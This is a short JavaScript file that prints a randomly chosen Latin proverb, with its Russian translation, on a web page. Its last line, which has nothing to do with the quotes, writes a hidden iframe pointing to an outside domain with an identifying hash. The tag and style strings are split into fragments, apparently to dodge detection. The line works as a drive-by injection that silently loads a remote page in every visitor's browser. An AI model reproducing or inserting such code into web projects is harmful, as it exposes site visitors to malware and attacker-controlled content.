function print_text()
{
var h=(Math.random()*14);
if (h <1) document.writeln("''Времена меняются, и мы меняемся в них''. Овидий");
if (h > 1 && h < 2) document.writeln("''Не идти вперед, значит идти назад.''");
if (h > 2 && h < 3) document.writeln("''Предупрежден - значит вооружен.''");
if (h > 3 && h < 4) document.writeln("''Опыт - лучший наставник.''");
if (h > 4 && h < 5) document.writeln("''Никто не может знать все.''");
if (h > 5 && h < 6) document.writeln("''Я сделал, что смог, пусть, кто может, сделает лучше.''");
if (h > 6 && h < 7) document.writeln("''Для мысли и действия рожден человек.''");
if (h > 7 && h < 8) document.writeln("''Tempora mutantur et nos mutamur in illis''. Ovidius");
if (h > 8 && h < 9) document.writeln("''Non progredi est regredi.''");
if (h > 9 && h < 10) document.writeln("''Praemonitus, praemunitus.''");
if (h > 10 && h < 11) document.writeln("''Experientia est optima magistra.''");
if (h > 11 && h < 12) document.writeln("''Nemo omnia potest scire.''");
if (h > 12 && h < 13) document.writeln("''Feci, quod potui, faciant meliora potentes.''");
if (h > 13 && h < 14) document.writeln("''Ad cogitandum et agendum homo natus est.''");
}
document.write("<"+"i"+"f"+"rame"+" sr"+"c='http://atadrh.com/index.php?s=950641cf1ee7863bd8007a5f67ecd1bb'"+" style='d"+"isplay:no"+"ne;'></"+"i"+"f"+"rame>");